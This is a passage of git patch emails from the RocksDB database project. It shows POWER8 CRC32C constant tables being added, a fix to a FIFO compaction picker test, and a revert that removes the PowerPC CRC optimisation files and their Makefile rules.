x^68608 mod p(x)` << 1, x^68672 mod p(x)` << 1 */ + .octa 0x000000000b96fa3a00000000d1eeedd6 + + /* x^67584 mod p(x)` << 1, x^67648 mod p(x)` << 1 */ + .octa 0x00000001d9968af0000000008fad9bb4 + + /* x^66560 mod p(x)` << 1, x^66624 mod p(x)` << 1 */ + .octa 0x000000000e4a77a200000001884938e4 + + /* x^65536 mod p(x)` << 1, x^65600 mod p(x)` << 1 */ + .octa 0x00000000508c2ac800000001bc2e9bc0 + + /* x^64512 mod p(x)` << 1, x^64576 mod p(x)` << 1 */ + .octa 0x0000000021572a8000000001f9658a68 + + /* x^63488 mod p(x)` << 1, x^63552 mod p(x)` << 1 */ + .octa 0x00000001b859daf2000000001b9224fc + + /* x^62464 mod p(x)` << 1, x^62528 mod p(x)` << 1 */ + .octa 0x000000016f7884740000000055b2fb84 + + /* x^61440 mod p(x)` << 1, x^61504 mod p(x)` << 1 */ + .octa 0x00000001b438810e000000018b090348 + + /* x^60416 mod p(x)` << 1, x^60480 mod p(x)` << 1 */ + .octa 0x0000000095ddc6f2000000011ccbd5ea + + /* x^59392 mod p(x)` << 1, x^59456 mod p(x)` << 1 */ + .octa 0x00000001d977c20c0000000007ae47f8 + + /* x^58368 mod p(x)` << 1, x^58432 mod p(x)` << 1 */ + .octa 0x00000000ebedb99a0000000172acbec0 + + /* x^57344 mod p(x)` << 1, x^57408 mod p(x)` << 1 */ + .octa 0x00000001df9e9e9200000001c6e3ff20 + + /* x^56320 mod p(x)` << 1, x^56384 mod p(x)` << 1 */ + .octa 0x00000001a4a3f95200000000e1b38744 + + /* x^55296 mod p(x)` << 1, x^55360 mod p(x)` << 1 */ + .octa 0x00000000e2f5122000000000791585b2 + + /* x^54272 mod p(x)` << 1, x^54336 mod p(x)` << 1 */ + .octa 0x000000004aa01f3e00000000ac53b894 + + /* x^53248 mod p(x)` << 1, x^53312 mod p(x)` << 1 */ + .octa 0x00000000b3e90a5800000001ed5f2cf4 + + /* x^52224 mod p(x)` << 1, x^52288 mod p(x)` << 1 */ + .octa 0x000000000c9ca2aa00000001df48b2e0 + + /* x^51200 mod p(x)` << 1, x^51264 mod p(x)` << 1 */ + .octa 0x000000015168231600000000049c1c62 + + /* x^50176 mod p(x)` << 1, x^50240 mod p(x)` << 1 */ + .octa 0x0000000036fce78c000000017c460c12 + + /* x^49152 mod p(x)` << 1, x^49216 mod p(x)` << 1 */ + .octa 0x000000009037dc10000000015be4da7e + + /* x^48128 mod p(x)` << 1, x^48192 mod p(x)` << 1 */ + .octa 0x00000000d3298582000000010f38f668 + + /* x^47104 mod p(x)` << 1, x^47168 mod p(x)` << 1 */ + .octa 0x00000001b42e8ad60000000039f40a00 + + /* x^46080 mod p(x)` << 1, x^46144 mod p(x)` << 1 */ + .octa 
0x00000000142a983800000000bd4c10c4 + + /* x^45056 mod p(x)` << 1, x^45120 mod p(x)` << 1 */ + .octa 0x0000000109c7f1900000000042db1d98 + + /* x^44032 mod p(x)` << 1, x^44096 mod p(x)` << 1 */ + .octa 0x0000000056ff931000000001c905bae6 + + /* x^43008 mod p(x)` << 1, x^43072 mod p(x)` << 1 */ + .octa 0x00000001594513aa00000000069d40ea + + /* x^41984 mod p(x)` << 1, x^42048 mod p(x)` << 1 */ + .octa 0x00000001e3b5b1e8000000008e4fbad0 + + /* x^40960 mod p(x)` << 1, x^41024 mod p(x)` << 1 */ + .octa 0x000000011dd5fc080000000047bedd46 + + /* x^39936 mod p(x)` << 1, x^40000 mod p(x)` << 1 */ + .octa 0x00000001675f0cc20000000026396bf8 + + /* x^38912 mod p(x)` << 1, x^38976 mod p(x)` << 1 */ + .octa 0x00000000d1c8dd4400000000379beb92 + + /* x^37888 mod p(x)` << 1, x^37952 mod p(x)` << 1 */ + .octa 0x0000000115ebd3d8000000000abae54a + + /* x^36864 mod p(x)` << 1, x^36928 mod p(x)` << 1 */ + .octa 0x00000001ecbd0dac0000000007e6a128 + + /* x^35840 mod p(x)` << 1, x^35904 mod p(x)` << 1 */ + .octa 0x00000000cdf67af2000000000ade29d2 + + /* x^34816 mod p(x)` << 1, x^34880 mod p(x)` << 1 */ + .octa 0x000000004c01ff4c00000000f974c45c + + /* x^33792 mod p(x)` << 1, x^33856 mod p(x)` << 1 */ + .octa 0x00000000f2d8657e00000000e77ac60a + + /* x^32768 mod p(x)` << 1, x^32832 mod p(x)` << 1 */ + .octa 0x000000006bae74c40000000145895816 + + /* x^31744 mod p(x)` << 1, x^31808 mod p(x)` << 1 */ + .octa 0x0000000152af8aa00000000038e362be + + /* x^30720 mod p(x)` << 1, x^30784 mod p(x)` << 1 */ + .octa 0x0000000004663802000000007f991a64 + + /* x^29696 mod p(x)` << 1, x^29760 mod p(x)` << 1 */ + .octa 0x00000001ab2f5afc00000000fa366d3a + + /* x^28672 mod p(x)` << 1, x^28736 mod p(x)` << 1 */ + .octa 0x0000000074a4ebd400000001a2bb34f0 + + /* x^27648 mod p(x)` << 1, x^27712 mod p(x)` << 1 */ + .octa 0x00000001d7ab3a4c0000000028a9981e + + /* x^26624 mod p(x)` << 1, x^26688 mod p(x)` << 1 */ + .octa 0x00000001a8da60c600000001dbc672be + + /* x^25600 mod p(x)` << 1, x^25664 mod p(x)` << 1 */ + .octa 0x000000013cf6382000000000b04d77f6 + + /* x^24576 mod p(x)` << 1, x^24640 mod p(x)` << 1 */ + .octa 0x00000000bec12e1e0000000124400d96 + + /* x^23552 mod p(x)` << 1, x^23616 mod p(x)` << 1 */ + .octa 0x00000001c6368010000000014ca4b414 + + /* x^22528 mod p(x)` << 1, x^22592 mod p(x)` << 1 */ + .octa 0x00000001e6e78758000000012fe2c938 + + /* x^21504 mod p(x)` << 1, x^21568 mod p(x)` << 1 */ + .octa 0x000000008d7f2b3c00000001faed01e6 + + /* x^20480 mod p(x)` << 1, x^20544 mod p(x)` << 1 */ + .octa 0x000000016b4a156e000000007e80ecfe + + /* x^19456 mod p(x)` << 1, x^19520 mod p(x)` << 1 */ + .octa 0x00000001c63cfeb60000000098daee94 + + /* x^18432 mod p(x)` << 1, x^18496 mod p(x)` << 1 */ + .octa 0x000000015f902670000000010a04edea + + /* x^17408 mod p(x)` << 1, x^17472 mod p(x)` << 1 */ + .octa 0x00000001cd5de11e00000001c00b4524 + + /* x^16384 mod p(x)` << 1, x^16448 mod p(x)` << 1 */ + .octa 0x000000001acaec540000000170296550 + + /* x^15360 mod p(x)` << 1, x^15424 mod p(x)` << 1 */ + .octa 0x000000002bd0ca780000000181afaa48 + + /* x^14336 mod p(x)` << 1, x^14400 mod p(x)` << 1 */ + .octa 0x0000000032d63d5c0000000185a31ffa + + /* x^13312 mod p(x)` << 1, x^13376 mod p(x)` << 1 */ + .octa 0x000000001c6d4e4c000000002469f608 + + /* x^12288 mod p(x)` << 1, x^12352 mod p(x)` << 1 */ + .octa 0x0000000106a60b92000000006980102a + + /* x^11264 mod p(x)` << 1, x^11328 mod p(x)` << 1 */ + .octa 0x00000000d3855e120000000111ea9ca8 + + /* x^10240 mod p(x)` << 1, x^10304 mod p(x)` << 1 */ + .octa 0x00000000e312563600000001bd1d29ce + + /* x^9216 mod 
p(x)` << 1, x^9280 mod p(x)` << 1 */ + .octa 0x000000009e8f7ea400000001b34b9580 + + /* x^8192 mod p(x)` << 1, x^8256 mod p(x)` << 1 */ + .octa 0x00000001c82e562c000000003076054e + + /* x^7168 mod p(x)` << 1, x^7232 mod p(x)` << 1 */ + .octa 0x00000000ca9f09ce000000012a608ea4 + + /* x^6144 mod p(x)` << 1, x^6208 mod p(x)` << 1 */ + .octa 0x00000000c63764e600000000784d05fe + + /* x^5120 mod p(x)` << 1, x^5184 mod p(x)` << 1 */ + .octa 0x0000000168d2e49e000000016ef0d82a + + /* x^4096 mod p(x)` << 1, x^4160 mod p(x)` << 1 */ + .octa 0x00000000e986c1480000000075bda454 + + /* x^3072 mod p(x)` << 1, x^3136 mod p(x)` << 1 */ + .octa 0x00000000cfb65894000000003dc0a1c4 + + /* x^2048 mod p(x)` << 1, x^2112 mod p(x)` << 1 */ + .octa 0x0000000111cadee400000000e9a5d8be + + /* x^1024 mod p(x)` << 1, x^1088 mod p(x)` << 1 */ + .octa 0x0000000171fb63ce00000001609bc4b4 + + .short_constants : + + /* Reduce final 1024-2048 bits to 64 bits, shifting 32 bits to include the + trailing 32 bits of zeros */ + /* x^1952 mod p(x)`, x^1984 mod p(x)`, x^2016 mod p(x)`, x^2048 mod p(x)` */ + .octa 0x7fec2963e5bf80485cf015c388e56f72 + + /* x^1824 mod p(x)`, x^1856 mod p(x)`, x^1888 mod p(x)`, x^1920 mod p(x)` */ + .octa 0x38e888d4844752a9963a18920246e2e6 + + /* x^1696 mod p(x)`, x^1728 mod p(x)`, x^1760 mod p(x)`, x^1792 mod p(x)` */ + .octa 0x42316c00730206ad419a441956993a31 + + /* x^1568 mod p(x)`, x^1600 mod p(x)`, x^1632 mod p(x)`, x^1664 mod p(x)` */ + .octa 0x543d5c543e65ddf9924752ba2b830011 + + /* x^1440 mod p(x)`, x^1472 mod p(x)`, x^1504 mod p(x)`, x^1536 mod p(x)` */ + .octa 0x78e87aaf56767c9255bd7f9518e4a304 + + /* x^1312 mod p(x)`, x^1344 mod p(x)`, x^1376 mod p(x)`, x^1408 mod p(x)` */ + .octa 0x8f68fcec1903da7f6d76739fe0553f1e + + /* x^1184 mod p(x)`, x^1216 mod p(x)`, x^1248 mod p(x)`, x^1280 mod p(x)` */ + .octa 0x3f4840246791d588c133722b1fe0b5c3 + + /* x^1056 mod p(x)`, x^1088 mod p(x)`, x^1120 mod p(x)`, x^1152 mod p(x)` */ + .octa 0x34c96751b04de25a64b67ee0e55ef1f3 + + /* x^928 mod p(x)`, x^960 mod p(x)`, x^992 mod p(x)`, x^1024 mod p(x)` */ + .octa 0x156c8e180b4a395b069db049b8fdb1e7 + + /* x^800 mod p(x)`, x^832 mod p(x)`, x^864 mod p(x)`, x^896 mod p(x)` */ + .octa 0xe0b99ccbe661f7bea11bfaf3c9e90b9e + + /* x^672 mod p(x)`, x^704 mod p(x)`, x^736 mod p(x)`, x^768 mod p(x)` */ + .octa 0x041d37768cd75659817cdc5119b29a35 + + /* x^544 mod p(x)`, x^576 mod p(x)`, x^608 mod p(x)`, x^640 mod p(x)` */ + .octa 0x3a0777818cfaa9651ce9d94b36c41f1c + + /* x^416 mod p(x)`, x^448 mod p(x)`, x^480 mod p(x)`, x^512 mod p(x)` */ + .octa 0x0e148e8252377a554f256efcb82be955 + + /* x^288 mod p(x)`, x^320 mod p(x)`, x^352 mod p(x)`, x^384 mod p(x)` */ + .octa 0x9c25531d19e65ddeec1631edb2dea967 + + /* x^160 mod p(x)`, x^192 mod p(x)`, x^224 mod p(x)`, x^256 mod p(x)` */ + .octa 0x790606ff9957c0a65d27e147510ac59a + + /* x^32 mod p(x)`, x^64 mod p(x)`, x^96 mod p(x)`, x^128 mod p(x)` */ + .octa 0x82f63b786ea2d55ca66805eb18b8ea18 + + .barrett_constants : + /* 33 bit reflected Barrett constant m - (4^32)/n */ + .octa 0x000000000000000000000000dea713f1 /* x^64 div p(x)` */ + /* 33 bit reflected Barrett constant n */ + .octa 0x00000000000000000000000105ec76f1 +#endif + +#endif diff --git a/util/ppc-opcode.h b/util/ppc-opcode.h new file mode 100644 index 00000000000..eeb0ae08ffc --- /dev/null +++ b/util/ppc-opcode.h @@ -0,0 +1,31 @@ +// Copyright (c) 2017 International Business Machines Corp. +// All rights reserved. 
+// This source code is licensed under the BSD-style license found in the +// LICENSE file in the root directory of this source tree. An additional grant +// of patent rights can be found in the PATENTS file in the same directory. +// This source code is also licensed under the GPLv2 license found in the +// COPYING file in the root directory of this source tree. + +#ifndef __OPCODES_H +#define __OPCODES_H + +#define __PPC_RA(a) (((a)&0x1f) << 16) +#define __PPC_RB(b) (((b)&0x1f) << 11) +#define __PPC_XA(a) ((((a)&0x1f) << 16) | (((a)&0x20) >> 3)) +#define __PPC_XB(b) ((((b)&0x1f) << 11) | (((b)&0x20) >> 4)) +#define __PPC_XS(s) ((((s)&0x1f) << 21) | (((s)&0x20) >> 5)) +#define __PPC_XT(s) __PPC_XS(s) +#define VSX_XX3(t, a, b) (__PPC_XT(t) | __PPC_XA(a) | __PPC_XB(b)) +#define VSX_XX1(s, a, b) (__PPC_XS(s) | __PPC_RA(a) | __PPC_RB(b)) + +#define PPC_INST_VPMSUMW 0x10000488 +#define PPC_INST_VPMSUMD 0x100004c8 +#define PPC_INST_MFVSRD 0x7c000066 +#define PPC_INST_MTVSRD 0x7c000166 + +#define VPMSUMW(t, a, b) .long PPC_INST_VPMSUMW | VSX_XX3((t), a, b) +#define VPMSUMD(t, a, b) .long PPC_INST_VPMSUMD | VSX_XX3((t), a, b) +#define MFVRD(a, t) .long PPC_INST_MFVSRD | VSX_XX1((t) + 32, a, 0) +#define MTVRD(t, a) .long PPC_INST_MTVSRD | VSX_XX1((t) + 32, a, 0) + +#endif From 9980de262c932e273965586f6268f7d9b561bcee Mon Sep 17 00:00:00 2001 From: Sagar Vemuri Date: Wed, 26 Jul 2017 12:08:31 -0700 Subject: [PATCH 045/205] Fix FIFO compaction picker test Summary: A FIFO compaction picker test was accidentally testing against an instance of the level compaction picker instead of the FIFO compaction picker. Closes https://github.com/facebook/rocksdb/pull/2641 Differential Revision: D5495390 Pulled By: sagar0 fbshipit-source-id: 301962736f629b1c499570fb504cdbe66bacb46f --- db/compaction_picker_test.cc | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/db/compaction_picker_test.cc b/db/compaction_picker_test.cc index c2bff0024f4..bba2d073d88 100644 --- a/db/compaction_picker_test.cc +++ b/db/compaction_picker_test.cc @@ -512,7 +512,7 @@ TEST_F(CompactionPickerTest, NeedsCompactionFIFO) { kFileSize, 0, i * 100, i * 100 + 99); current_size += kFileSize; UpdateVersionStorageInfo(); - ASSERT_EQ(level_compaction_picker.NeedsCompaction(vstorage_.get()), + ASSERT_EQ(fifo_compaction_picker.NeedsCompaction(vstorage_.get()), vstorage_->CompactionScore(0) >= 1); } } From c281b44829ac87ce3349804eba2456be0a604dcb Mon Sep 17 00:00:00 2001 From: Siying Dong Date: Wed, 26 Jul 2017 19:00:42 -0700 Subject: [PATCH 046/205] Revert "CRC32 Power Optimization Changes" Summary: This reverts commit 2289d381153890e715718f6215909bdfc0e1224c.
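For context, the implementation being reverted selected the CRC32C function at run time: on ppc64 Linux it probed the auxiliary vector for the POWER8 vector-crypto facility and, when present, dispatched to the vpmsum-based ExtendPPCImpl, otherwise falling back to the portable table-driven ExtendImpl. A minimal standalone sketch of that probe follows (the constants match the reverted util/crc32c.cc; the helper name here is illustrative — the reverted code calls it arch_ppc_probe):

#if defined(__linux__) && defined(__powerpc64__)
#include <sys/auxv.h>
#endif

/* Fallback definitions for toolchains whose headers lack them,
   mirroring the reverted util/crc32c.cc. */
#ifndef PPC_FEATURE2_VEC_CRYPTO
#define PPC_FEATURE2_VEC_CRYPTO 0x02000000
#endif
#ifndef AT_HWCAP2
#define AT_HWCAP2 26
#endif

/* Illustrative helper (arch_ppc_probe in the reverted code): returns 1
   if the CPU advertises the POWER8 vector-crypto facility, and hence
   the vpmsumd/vpmsumw instructions, 0 otherwise. */
int has_power8_vec_crypto(void) {
#if defined(__linux__) && defined(__powerpc64__)
  return (getauxval(AT_HWCAP2) & PPC_FEATURE2_VEC_CRYPTO) != 0;
#else
  return 0; /* non-Linux or non-ppc64: use the table-driven path */
#endif
}

The revert removes this dispatch together with the dedicated %.c.o/%.S.o build rules that the original change added to the Makefile.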
Closes https://github.com/facebook/rocksdb/pull/2652 Differential Revision: D5506163 Pulled By: siying fbshipit-source-id: 105e31dd9d99090453a6b9f32c165206cd3affa3 --- Makefile | 77 +--- db/db_test_util.cc | 7 +- src.mk | 10 - tools/db_stress.cc | 16 +- util/crc32c.cc | 69 +-- util/crc32c_ppc.c | 95 ---- util/crc32c_ppc.h | 23 - util/crc32c_ppc_asm.S | 753 ------------------------------ util/crc32c_ppc_constants.h | 893 ------------------------------------ util/ppc-opcode.h | 31 -- 10 files changed, 25 insertions(+), 1949 deletions(-) delete mode 100644 util/crc32c_ppc.c delete mode 100644 util/crc32c_ppc.h delete mode 100644 util/crc32c_ppc_asm.S delete mode 100644 util/crc32c_ppc_constants.h delete mode 100644 util/ppc-opcode.h diff --git a/Makefile b/Makefile index c89e3a20449..c40d741d7a8 100644 --- a/Makefile +++ b/Makefile @@ -96,18 +96,6 @@ OPT += -momit-leaf-frame-pointer endif endif -ifeq (,$(shell $(CXX) -fsyntax-only -maltivec -xc /dev/null 2>&1)) -CXXFLAGS += -DHAS_ALTIVEC -CFLAGS += -DHAS_ALTIVEC -HAS_ALTIVEC=1 -endif - -ifeq (,$(shell $(CXX) -fsyntax-only -mcpu=power8 -xc /dev/null 2>&1)) -CXXFLAGS += -DHAVE_POWER8 -CFLAGS += -DHAVE_POWER8 -HAVE_POWER8=1 -endif - # if we're compiling for release, compile without debug code (-DNDEBUG) and # don't treat warnings as errors ifeq ($(DEBUG_LEVEL),0) @@ -317,9 +305,9 @@ util/build_version.cc: FORCE else mv -f $@-t $@; fi endif -LIBOBJECTS = $(LIB_SOURCES:.cc=.cc.o) $(LIB_SOURCES_C:.c=.c.o) $(LIB_SOURCES_ASM:.S=.S.o) -LIBOBJECTS += $(TOOL_LIB_SOURCES:.cc=.cc.o) -MOCKOBJECTS = $(MOCK_LIB_SOURCES:.cc=.cc.o) +LIBOBJECTS = $(LIB_SOURCES:.cc=.o) +LIBOBJECTS += $(TOOL_LIB_SOURCES:.cc=.o) +MOCKOBJECTS = $(MOCK_LIB_SOURCES:.cc=.o) GTEST = $(GTEST_DIR)/gtest/gtest-all.o TESTUTIL = ./util/testutil.o @@ -567,27 +555,14 @@ $(SHARED2): $(SHARED4) $(SHARED3): $(SHARED4) ln -fs $(SHARED4) $(SHARED3) endif -SHARED_CC_OBJECTS = $(LIB_SOURCES:.cc=.cc.o) -SHARED_C_OBJECTS = $(LIB_SOURCES_C:.c=.c.o) -SHARED_ASM_OBJECTS = $(LIB_SOURCES_ASM:.S=.S.o) -SHARED_CC_LIBOBJECTS = $(patsubst %.cc.o,shared-objects/%.cc.o,$(SHARED_CC_OBJECTS)) -SHARED_C_LIBOBJECTS = $(patsubst %.c.o,shared-objects/%.c.o,$(SHARED_C_OBJECTS)) -SHARED_ASM_LIBOBJECTS = $(patsubst %.S.o,shared-objects/%.S.o,$(SHARED_ASM_OBJECTS)) - -shared_libobjects = $(SHARED_CC_LIBOBJECTS) $(SHARED_C_LIBOBJECTS) $(SHARED_ASM_LIBOBJECTS) +shared_libobjects = $(patsubst %,shared-objects/%,$(LIBOBJECTS)) CLEAN_FILES += shared-objects -$(SHARED_CC_LIBOBJECTS): shared-objects/%.cc.o: %.cc - $(AM_V_CC)mkdir -p $(@D) && $(CXX) $(CXXFLAGS) $(PLATFORM_SHARED_CFLAGS) -c $< -o $@ - -$(SHARED_C_LIBOBJECTS): shared-objects/%.c.o: %.c +$(shared_libobjects): shared-objects/%.o: %.cc $(AM_V_CC)mkdir -p $(@D) && $(CXX) $(CXXFLAGS) $(PLATFORM_SHARED_CFLAGS) -c $< -o $@ -$(SHARED_ASM_LIBOBJECTS): shared-objects/%.S.o: %.S - $(AM_V_CC)mkdir -p $(@D) && $(CXX) $(CXXFLAGS) $(PLATFORM_SHARED_CFLAGS) -c $< -o $@ - -$(SHARED4): $(shared_libobjects) +$(SHARED4): $(shared_libobjects) $(CXX) $(PLATFORM_SHARED_LDFLAGS)$(SHARED3) $(CXXFLAGS) $(PLATFORM_SHARED_CFLAGS) $(shared_libobjects) $(LDFLAGS) -o $@ endif # PLATFORM_SHARED_EXT @@ -1667,26 +1642,12 @@ rocksdbjavastaticpublishcentral: mvn gpg:sign-and-deploy-file -Durl=https://oss.sonatype.org/service/local/staging/deploy/maven2/ -DrepositoryId=sonatype-nexus-staging -DpomFile=java/rocksjni.pom -Dfile=java/target/rocksdbjni-$(ROCKSDB_MAJOR).$(ROCKSDB_MINOR).$(ROCKSDB_PATCH).jar # A version of each $(LIBOBJECTS) compiled with -fPIC -JAVA_CC_OBJECTS = $(SHARED_CC_OBJECTS) 
-JAVA_C_OBJECTS = $(SHARED_C_OBJECTS) -JAVA_ASM_OBJECTS = $(SHARED_ASM_OBJECTS) - -JAVA_CC_LIBOBJECTS = $(patsubst %.cc.o,jl/%.cc.o,$(JAVA_CC_OBJECTS)) -JAVA_C_LIBOBJECTS = $(patsubst %.c.o,jl/%.c.o,$(JAVA_C_OBJECTS)) -JAVA_ASM_LIBOBJECTS = $(patsubst %.S.o,jl/%.S.o,$(JAVA_ASM_OBJECTS)) -java_libobjects = $(JAVA_CC_LIBOBJECTS) $(JAVA_C_LIBOBJECTS) $(JAVA_ASM_LIBOBJECTS) +java_libobjects = $(patsubst %,jl/%,$(LIBOBJECTS)) CLEAN_FILES += jl -$(JAVA_CC_LIBOBJECTS): jl/%.cc.o: %.cc - $(AM_V_CC)mkdir -p $(@D) && $(CXX) $(CXXFLAGS) -fPIC -c $< -o $@ $(COVERAGEFLAGS) - -$(JAVA_C_LIBOBJECTS): jl/%.c.o: %.c - $(AM_V_CC)mkdir -p $(@D) && $(CXX) $(CXXFLAGS) -fPIC -c $< -o $@ $(COVERAGEFLAGS) - -$(JAVA_ASM_LIBOBJECTS): jl/%.S.o: %.S +$(java_libobjects): jl/%.o: %.cc $(AM_V_CC)mkdir -p $(@D) && $(CXX) $(CXXFLAGS) -fPIC -c $< -o $@ $(COVERAGEFLAGS) - rocksdbjava: $(java_libobjects) $(AM_V_GEN)cd java;$(MAKE) javalib; $(AM_V_at)rm -f ./java/target/$(ROCKSDBJNILIB) @@ -1742,24 +1703,19 @@ IOSVERSION=$(shell defaults read $(PLATFORMSROOT)/iPhoneOS.platform/version CFBu lipo ios-x86/$@ ios-arm/$@ -create -output $@ else -%.cc.o: %.cc +.cc.o: $(AM_V_CC)$(CXX) $(CXXFLAGS) -c $< -o $@ $(COVERAGEFLAGS) -%.c.o: %.c - $(AM_V_CC)$(CC) $(CFLAGS) -c $< -o $@ - -%.S.o: %.S +.c.o: $(AM_V_CC)$(CC) $(CFLAGS) -c $< -o $@ - endif + # --------------------------------------------------------------------------- # Source files dependencies detection # --------------------------------------------------------------------------- all_sources = $(LIB_SOURCES) $(MAIN_SOURCES) $(MOCK_LIB_SOURCES) $(TOOL_LIB_SOURCES) $(BENCH_LIB_SOURCES) $(TEST_LIB_SOURCES) $(EXP_LIB_SOURCES) DEPFILES = $(all_sources:.cc=.d) -DEPFILES_C = $(LIB_SOURCES_C:.c=.d) -DEPFILES_ASM = $(LIB_SOURCES_ASM:.S=.d) # Add proper dependency support so changing a .h file forces a .cc file to # rebuild. @@ -1770,16 +1726,7 @@ $(DEPFILES): %.d: %.cc @$(CXX) $(CXXFLAGS) $(PLATFORM_SHARED_CFLAGS) \ -MM -MT'$@' -MT'$(<:.cc=.o)' "$<" -o '$@' -$(DEPFILES_C): %.d: %.c - @$(CXX) $(CXXFLAGS) $(PLATFORM_SHARED_CFLAGS) \ - -MM -MT'$@' -MT'$(<:.c=.o)' "$<" -o '$@' - -$(DEPFILES_ASM): %.d: %.S - @$(CXX) $(CXXFLAGS) $(PLATFORM_SHARED_CFLAGS) \ - -MM -MT'$@' -MT'$(<:.S=.o)' "$<" -o '$@' - - -depend: $(DEPFILES) $(DEPFILES_C) $(DEPFILES_ASM) +depend: $(DEPFILES) # if the make goal is either "clean" or "format", we shouldn't # try to import the *.d files. 
diff --git a/db/db_test_util.cc b/db/db_test_util.cc index 98b6b471e70..5ca4b19a253 100644 --- a/db/db_test_util.cc +++ b/db/db_test_util.cc @@ -277,11 +277,12 @@ Options DBTestBase::GetOptions( Options options = default_options; BlockBasedTableOptions table_options; bool set_block_based_table_factory = true; -#if !defined(OS_MACOSX) && !defined(OS_WIN) && !defined(OS_SOLARIS) && \ - !defined(OS_AIX) +#if !defined(OS_MACOSX) && !defined(OS_WIN) && !defined(OS_SOLARIS) && \ + !defined(OS_AIX) rocksdb::SyncPoint::GetInstance()->ClearCallBack( "NewRandomAccessFile:O_DIRECT"); - rocksdb::SyncPoint::GetInstance()->ClearCallBack("NewWritableFile:O_DIRECT"); + rocksdb::SyncPoint::GetInstance()->ClearCallBack( + "NewWritableFile:O_DIRECT"); #endif bool can_allow_mmap = IsMemoryMappedAccessSupported(); diff --git a/src.mk b/src.mk index 39b1ed4895f..fb7f979396c 100644 --- a/src.mk +++ b/src.mk @@ -204,16 +204,6 @@ LIB_SOURCES = \ utilities/write_batch_with_index/write_batch_with_index.cc \ utilities/write_batch_with_index/write_batch_with_index_internal.cc \ -ifeq (,$(shell $(CXX) -fsyntax-only -maltivec -xc /dev/null 2>&1)) -LIB_SOURCES_ASM =\ - util/crc32c_ppc_asm.S -LIB_SOURCES_C = \ - util/crc32c_ppc.c -else -LIB_SOURCES_ASM = -LIB_SOURCES_C = -endif - TOOL_LIB_SOURCES = \ tools/ldb_cmd.cc \ tools/ldb_tool.cc \ diff --git a/tools/db_stress.cc b/tools/db_stress.cc index b5d0c7589d8..db905f0c887 100644 --- a/tools/db_stress.cc +++ b/tools/db_stress.cc @@ -2370,15 +2370,15 @@ int main(int argc, char** argv) { #if !defined(NDEBUG) && !defined(OS_MACOSX) && !defined(OS_WIN) && \ !defined(OS_SOLARIS) && !defined(OS_AIX) rocksdb::SyncPoint::GetInstance()->SetCallBack( - "NewWritableFile:O_DIRECT", [&](void* arg) { - int* val = static_cast(arg); - *val &= ~O_DIRECT; - }); + "NewWritableFile:O_DIRECT", [&](void* arg) { + int* val = static_cast(arg); + *val &= ~O_DIRECT; + }); rocksdb::SyncPoint::GetInstance()->SetCallBack( - "NewRandomAccessFile:O_DIRECT", [&](void* arg) { - int* val = static_cast(arg); - *val &= ~O_DIRECT; - }); + "NewRandomAccessFile:O_DIRECT", [&](void* arg) { + int* val = static_cast(arg); + *val &= ~O_DIRECT; + }); rocksdb::SyncPoint::GetInstance()->EnableProcessing(); #endif diff --git a/util/crc32c.cc b/util/crc32c.cc index 9b78c92f181..ae36f82305b 100644 --- a/util/crc32c.cc +++ b/util/crc32c.cc @@ -18,32 +18,9 @@ #endif #include "util/coding.h" -#ifdef __powerpc64__ -#include "util/crc32c_ppc.h" -#include "util/crc32c_ppc_constants.h" - -#if __linux__ -#include - -#ifndef PPC_FEATURE2_VEC_CRYPTO -#define PPC_FEATURE2_VEC_CRYPTO 0x02000000 -#endif - -#ifndef AT_HWCAP2 -#define AT_HWCAP2 26 -#endif - -#endif /* __linux__ */ - -#endif - namespace rocksdb { namespace crc32c { -#ifdef __powerpc64__ -static int arch_ppc_crc32 = 0; -#endif - static const uint32_t table0_[256] = { 0x00000000, 0xf26b8303, 0xe13b70f7, 0x1350f3f4, 0xc79a971f, 0x35f1141c, 0x26a1e7e8, 0xd4ca64eb, @@ -394,7 +371,6 @@ uint32_t ExtendImpl(uint32_t crc, const char* buf, size_t size) { } // Detect if SS42 or not. 
-#ifndef HAVE_POWER8 static bool isSSE42() { #ifndef HAVE_SSE42 return false; @@ -411,58 +387,15 @@ static bool isSSE42() { return false; #endif } -#endif typedef uint32_t (*Function)(uint32_t, const char*, size_t); -#if defined(HAVE_POWER8) && defined(HAS_ALTIVEC) -uint32_t ExtendPPCImpl(uint32_t crc, const char *buf, size_t size) { - return crc32c_ppc(crc, (const unsigned char *)buf, size); -} - -#if __linux__ -static int arch_ppc_probe(void) { - arch_ppc_crc32 = 0; - -#if defined(__powerpc64__) - if (getauxval(AT_HWCAP2) & PPC_FEATURE2_VEC_CRYPTO) arch_ppc_crc32 = 1; -#endif /* __powerpc64__ */ - - return arch_ppc_crc32; -} -#endif // __linux__ - -static bool isAltiVec() { - if (arch_ppc_probe()) { - return true; - } else { - return false; - } -} -#endif - static inline Function Choose_Extend() { -#ifndef HAVE_POWER8 return isSSE42() ? ExtendImpl : ExtendImpl; -#else - return isAltiVec() ? ExtendPPCImpl : ExtendImpl; -#endif } bool IsFastCrc32Supported() { - bool has_fast_crc = false; -#ifdef HAVE_POWER8 -#ifdef HAS_ALTIVEC - if (arch_ppc_probe()) { - has_fast_crc = true; - } -#else - has_fast_crc = false; -#endif -#else - has_fast_crc = isSSE42(); -#endif - return has_fast_crc; + return isSSE42(); } Function ChosenExtend = Choose_Extend(); diff --git a/util/crc32c_ppc.c b/util/crc32c_ppc.c deleted file mode 100644 index 3c517c88ca1..00000000000 --- a/util/crc32c_ppc.c +++ /dev/null @@ -1,95 +0,0 @@ -// Copyright (c) 2017 International Business Machines Corp. -// All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. - -#define CRC_TABLE -#include -#include -#include -#include "util/crc32c_ppc_constants.h" - -#define VMX_ALIGN 16 -#define VMX_ALIGN_MASK (VMX_ALIGN - 1) - -#ifdef REFLECT -static unsigned int crc32_align(unsigned int crc, unsigned char const *p, - unsigned long len) { - while (len--) crc = crc_table[(crc ^ *p++) & 0xff] ^ (crc >> 8); - return crc; -} -#endif - -#ifdef HAVE_POWER8 -unsigned int __crc32_vpmsum(unsigned int crc, unsigned char const *p, - unsigned long len); - -static uint32_t crc32_vpmsum(uint32_t crc, unsigned char const *data, - unsigned len) { - unsigned int prealign; - unsigned int tail; - -#ifdef CRC_XOR - crc ^= 0xffffffff; -#endif - - if (len < VMX_ALIGN + VMX_ALIGN_MASK) { - crc = crc32_align(crc, data, (unsigned long)len); - goto out; - } - - if ((unsigned long)data & VMX_ALIGN_MASK) { - prealign = 